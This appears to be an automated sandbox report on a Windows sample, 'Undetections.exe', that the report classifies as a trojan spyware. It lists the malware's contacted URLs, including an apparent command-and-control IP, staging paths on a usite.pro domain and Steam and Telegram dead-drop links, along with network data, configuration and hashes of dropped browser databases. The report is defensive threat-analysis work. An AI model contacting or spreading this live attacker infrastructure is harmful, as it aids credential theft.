                                                          https://95.217.212.139IJKRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                            high
                                                            http://www.galapagosdesign.com/DPleaseUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://foo/fonts/fa-brands-400.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                              high
                                                              http://www.zhongyicts.com.cnUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • 1%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://95.217.212.139/(RegAsm.exe, 00000004.00000002.2138534341.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUndetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                  high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EHCBAAAF.4.drfalse
                                                                    high
                                                                    http://ashjghas.ucoz.netdUndetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.ecosia.org/newtab/EHCBAAAF.4.drfalse
                                                                      high
                                                                      http://www.carterandcone.comlUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                        high
                                                                        http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        http://foo/bar/fonts/fa-brands-400.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                          high
                                                                          http://foo/fonts/fa-regular-400.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                            high
                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                              high
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesDGCAAFBF.4.drfalse
                                                                                high
                                                                                http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-regular-400.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                low
                                                                                http://foo/bar/fonts/fa-brands-400.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                low
                                                                                https://steamcommunity.com/profiles/76561199662282318https://t.me/t8jmhlCristinaspoofer.exe, 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://universalbeure.usite.proUndetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://universalbeure.usite.proUndetections.exe, 00000000.00000002.4082954500.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.founder.com.cn/cn/bTheUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://95.217.212.139/yRegAsm.exe, 00000004.00000002.2138534341.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/hwids.txtdUndetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://95.217.212.139FIJRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        low
                                                                                        https://help.steampowered.com/en/RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                          high
                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F7656119966228231876561199662282318[1].htm.4.drfalse
                                                                                            high
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                              high
                                                                                              http://www.typography.netDUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                high
                                                                                                https://95.217.212.139FHIRegAsm.exe, 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                  high
                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                    high
                                                                                                    https://95.217.212.139/oamingRegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.fonts.comUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.sandoll.co.krUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://steamcommunity.com/workshop/RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/legal/RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                          high
                                                                                                          https://discord.gg/tZZe4x6PH6Undetections.exefalse
                                                                                                          • 1%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://95.217.212.139/mozglue.dllARegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildName.txtt-kqUndetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://95.217.212.139/4RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://95.217.212.139/:RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=enRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                              high
                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoEHCBAAAF.4.drfalse
                                                                                                                high
                                                                                                                https://www.siticoneframework.com/pricing.htmlFSoftwareUndetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • 1%, Virustotal, Browse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://95.217.212.139/8RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://store.steampowered.com/76561199662282318[1].htm.4.drfalse
                                                                                                                  high
                                                                                                                  https://95.217.212.139/KRegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://foo/fonts/fa-regular-400.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  low
                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.founder.com.cn/cnUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://95.217.212.139/TRegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                      high
                                                                                                                      https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildLink.txtdUndetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
104.102.129.112 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
172.253.115.113 | google.com | United States | 15169 | GOOGLEUS | false
193.109.246.100 | universalbeure.usite.pro | Virgin Islands (BRITISH) | 204343 | COMPUBYTE-ASRU | false
95.217.212.139 | unknown | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1423660
Start date and time: 2024-04-10 08:55:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Undetections.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/28@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 284
• Number of non-executed functions: 14
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
08:56:06 | API Interceptor | 12534422x Sleep call for process: Undetections.exe modified
08:56:21 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                  • 144.76.136.153
                                                                                                                                                                  aT0T5g9qvp.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                  • 49.12.172.243
                                                                                                                                                                  https://download.advanced-port-scanner.com/download/files/Advanced_Port_Scanner_2.5.3869.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 213.133.104.63
                                                                                                                                                                  https://download.advanced-port-scanner.com/download/files/Advanced_Port_Scanner_2.5.3869.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 213.133.104.63
                                                                                                                                                                  https://www.vauban-recrutement.fr/blog/emplois/transaction-manager-h-f/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 159.69.246.36
                                                                                                                                                                  https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 159.69.19.197
                                                                                                                                                                  http://esuper.giize.com/4KdWPP1856lOSI2nqblzfpcgp168GEHAQEXAOPNTAGQ68673BEJU278l9Get hashmaliciousPhisherBrowse
                                                                                                                                                                  • 178.63.248.54
                                                                                                                                                                  http://smoton.com/gpxnfvxv-nhuwlton-dctund7n-132s&c=E,1,GnOus4uw2lyEXKi4xzei6fra__pk0-P7SfhzjyUJKu7LFM8gCxNgwIOoMF2maIttEyAiuRrqybM6bdvq3o4uod10z0SdQIz20E-XYBUNe5zDPBfUogRt2X8esg,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 94.130.193.196
                                                                                                                                                                  https://smoton.com/gpxnfvxv-afzwqqqr-dctund7n-173aGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 213.239.249.8
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
